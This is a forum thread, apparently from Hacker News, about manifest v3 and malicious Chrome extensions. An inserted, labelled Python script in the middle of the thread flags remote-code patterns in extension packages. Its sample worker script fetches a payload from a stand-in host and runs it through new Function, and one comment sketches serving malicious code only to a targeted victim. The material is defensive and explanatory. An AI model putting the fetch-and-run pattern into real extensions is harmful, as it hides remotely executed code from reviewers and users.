
Comment by wnevets

2 days ago

I thought manifest v3 was supposed to make chrome extensions secure?

It's the reason why they found it, because the code was in the extension. Before manifest v3, extensions could just load external scripts and there's no way you could tell what they were actually doing.

  • > extensions could just load external scripts and there's no way you could tell what they were actually doing.

    I do think security researchers would be able to figure out what scripts are downloaded and run.

    Regardless, none of this seems to matter to end users whether the script is in the extension or external.

    • Nothing stopping server-side logic: if request.ip != myvictim, serve no malicious payload.

    • Even if the extension isn’t malicious, it creates a new attack vector that can affect users. If whatever URL the script is remotely loaded from is compromised, now all users of that extension are vulnerable.

  • Wait, does that mean Manifest v3 is so neutered that it can't load a `<script>` tag into the page if an extension needed to?

    If so, I feel like something that limited is hardly even a browser extension interface in the traditional sense.

    • Most browser extensions don’t need to insert script tags that point to arbitrary URLs on the internet. You can inject scripts that are bundled with the extension (you don’t even need to use an actual script tag). This is one part of manifest v3 that I think was actually a good change - ad blockers don’t do this so I don’t think Google had an ulterior motive for this particular limitation.

    • That is correct. You cannot inject external scripts. You can fetch from a remote and inject through the content script though, but the content and service worker code is known at review time.

      So you can still do everything you could before, but it's not as hidden anymore.
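The point made in this sub-thread is that manifest v3 puts the content script and service worker code inside the package, so a reviewer can inspect it statically. The following is an added example, not code from the thread or from any real extension: a small Python review script that reads a constructed sample package (a manifest plus two bundled scripts, all embedded inline), checks that every declared script is bundled rather than remote, and flags the usual indicators of remotely hosted or dynamically evaluated code (`eval`, `new Function`, `importScripts` of a URL, assigning an `http(s)` URL to `.src`). The sample package contents, the file names and the pattern list are my assumptions for the illustration; the checks are heuristics, not a complete audit.

```python
import json
import re

# Constructed sample package for the illustration (not a real extension).
# content.js is benign; worker.js fetches remote text and evaluates it,
# which is the pattern manifest v3's remote-code rules are meant to exclude.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({
        "manifest_version": 3,
        "name": "sample",
        "version": "1.0",
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
        "background": {"service_worker": "worker.js"},
    }),
    "content.js": "document.title = 'hello';\n",
    "worker.js": (
        "const r = await fetch('https://example.invalid/payload.js');\n"
        "new Function(await r.text())();\n"
    ),
}

# Heuristic indicators that code is loaded from outside the package or
# evaluated at runtime. Order matters only for deterministic reporting.
REMOTE_CODE_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "new Function": re.compile(r"\bnew\s+Function\s*\("),
    "importScripts of remote URL": re.compile(r"""importScripts\s*\(\s*['"]https?://"""),
    "remote script src assignment": re.compile(r"""\.src\s*=\s*['"]https?://"""),
}


def referenced_scripts(manifest):
    """Collect every script path the manifest declares (content scripts,
    background service worker, legacy background scripts). These are the
    files that run with extension privileges and must be in the package."""
    paths = []
    for cs in manifest.get("content_scripts", []):
        paths.extend(cs.get("js", []))
    background = manifest.get("background", {})
    if "service_worker" in background:
        paths.append(background["service_worker"])
    paths.extend(background.get("scripts", []))
    return paths


def review_extension(files):
    """Return a list of (file, finding) tuples for a package given as a
    mapping of path -> file contents."""
    manifest = json.loads(files["manifest.json"])
    findings = []
    if manifest.get("manifest_version") != 3:
        findings.append(("manifest.json", "not manifest v3"))
    for path in referenced_scripts(manifest):
        # A URL where a bundled path belongs means code is served remotely.
        if path.startswith(("http://", "https://", "//")):
            findings.append((path, "remote script reference"))
            continue
        # A declared script absent from the package cannot be reviewed.
        if path not in files:
            findings.append((path, "declared script missing from package"))
            continue
        for label, pattern in REMOTE_CODE_PATTERNS.items():
            if pattern.search(files[path]):
                findings.append((path, label))
    return findings


if __name__ == "__main__":
    for path, finding in review_extension(SAMPLE_EXTENSION):
        print(f"{path}: {finding}")
```

Run against the constructed sample, the only finding is `worker.js: new Function`; the benign content script produces nothing. A real review would also read the manifest's `content_security_policy` and follow the data flow from `fetch` to any sink, which this heuristic does not attempt.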

Let me ask you this way: How do you think they make money?

  • I believe you may be missing the sarcasm of the post you are responding to.

    • He may have understood it, but the feelings of anger about it are so overwhelming he had to post anyway, even if it didn't perfectly flow with the conversation.